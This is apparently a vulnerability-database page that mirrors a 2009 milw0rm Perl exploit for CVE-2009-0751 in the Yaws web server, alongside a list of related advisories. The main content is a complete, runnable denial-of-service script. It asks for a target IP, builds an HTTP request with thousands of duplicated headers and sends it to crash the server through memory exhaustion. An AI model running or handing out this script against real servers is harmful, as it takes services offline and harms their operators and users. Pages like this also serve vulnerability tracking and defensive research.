Lucene search

K

Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

Yaws < 1.80 Remote Denial of Service Exploit via Multiple Header

Show more
Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2009-0751
2 Mar 200922:00
cvelist
NVD
CVE-2009-0751
2 Mar 200922:30
nvd
seebug.org
Yaws &lt; 1.80 (multiple headers) Remote Denial of Service Exploit
3 Mar 200900:00
seebug
Packet Storm
Yaws Denial Of Service
5 Mar 200900:00
packetstorm
OpenVAS
Debian Security Advisory DSA 1740-1 (yaws)
20 Mar 200900:00
openvas
OpenVAS
Debian: Security Advisory (DSA-1740-1)
19 Mar 200900:00
openvas
Prion
Design/Logic Flaw
2 Mar 200922:30
prion
Debian CVE
CVE-2009-0751
2 Mar 200922:30
debiancve
exploitpack
Yaws 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities
3 Mar 200900:00
exploitpack
securityvulns
yaws Web server DoS
17 Mar 200900:00
securityvulns
Rows per page

                                                #!usr/bin/perl -w

#######################################################################################
#   Yaws before 1.80 allows remote attackers to cause a denial of service (memory
#   consumption and crash) via a request with a large number of headers.
#   Refer:
#        http://yaws.hyber.org/
#        http://www.securityfocus.com/bid/33834/discuss
#        http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#        Author:    Praveen Dar$hanam
#        Email:     praveen[underscore]recker[at]sify.com
#        Blog:       http://www.darshanams.blogspot.com/
#        Date:      03rd March, 2009
#        Site:       http://www.evilfingers.com/
#
###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks###
########################################################################################

use IO::Socket;

print(&#34;\nEnter IP Address of Yaws Server(not domain): \n&#34;);
$vuln_host_ip = &#60;STDIN&#62;;
chomp($vuln_host_ip);
$port = 80;

$sock_http = IO::Socket::INET-&#62;new(  PeerAddr =&#62; $vuln_host_ip,
                                     PeerPort =&#62; $port,
                                     Proto    =&#62; &#39;tcp&#39;) || &#34;Unable to create HTTP Socket&#34;;


$headers=&#34;Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n&#34;.
&#34;Accept-Ranges: bytes\r\n&#34;.
&#34;Content-Language: en\r\n&#34;.
&#34;Content-Type: text/html; charset=utf-8\r\n&#34;.
&#34;Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n&#34;.
&#34;Cache-Control: no-cache\r\n&#34;.
&#34;Content-Encoding: gzip\r\n&#34;.
&#34;Retry-After: 100\r\n&#34;;
print &#34;\nHeaders are:\n$headers&#34;;

$i=0;
while($i&#60;=13)    #this is just a PoC
{
$headers=$headers.$headers;
$i++;
}
print &#34;\nHeaders are:\n$headers&#34;;
$yaws_attack = &#34;GET / HTTP/1.1\r\n&#34;.
&#34;Host: $vuln_host_ip:$port\r\n&#34;.
&#34;User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n&#34;.
$headers.
&#34;Keep-Alive: 300\r\n&#34;.
&#34;Connection: keep-alive\r\n&#34;.
&#34;\r\n&#34;;
sleep(3);
print $sock_http $yaws_attack;
sleep(2);
print&#34;\nRequest with large number of Headers sent...\n&#34;;

close($sock_http);

# milw0rm.com [2009-03-03]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jul 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.182
12
.json
Report